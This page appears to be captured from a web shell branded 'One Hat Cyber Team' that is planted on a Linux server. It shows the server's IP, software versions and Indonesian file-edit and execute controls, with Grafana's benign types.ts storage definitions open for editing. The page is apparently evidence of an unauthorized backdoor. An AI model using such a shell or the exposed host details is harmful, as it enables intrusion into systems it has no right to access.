⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
grafana
/
public
/
app
/
features
/
storage
/
Edit File: types.ts
import { QueryResultMetaNotice, SelectableValue } from '@grafana/data'; export enum StorageView { Data = 'data', Config = 'config', Perms = 'perms', History = 'history', AddRoot = 'add', } export interface UploadResponse { status: number; statusText: string; err?: boolean; message: string; path: string; } export interface StorageInfo { editable?: boolean; builtin?: boolean; ready?: boolean; notice?: QueryResultMetaNotice[]; config: StorageConfig; } export interface StorageConfig { type: string; prefix: string; name: string; description: string; underContentRoot: string; disk?: { path: string; }; git?: { remote: string; branch: string; root: string; requirePullRequest: boolean; accessToken: string; }; sql?: {}; } export enum WorkflowID { Save = 'save', PR = 'pr', Push = 'push', } export interface WriteValueRequest { kind: string; body: {}; // json body message?: string; title?: string; workflow: WorkflowID; } export interface WriteValueResponse { code: number; message?: string; url?: string; hash?: string; branch?: string; pending?: boolean; size?: number; } export interface ItemOptions { path: string; workflows: Array<SelectableValue<WorkflowID>>; }
Simpan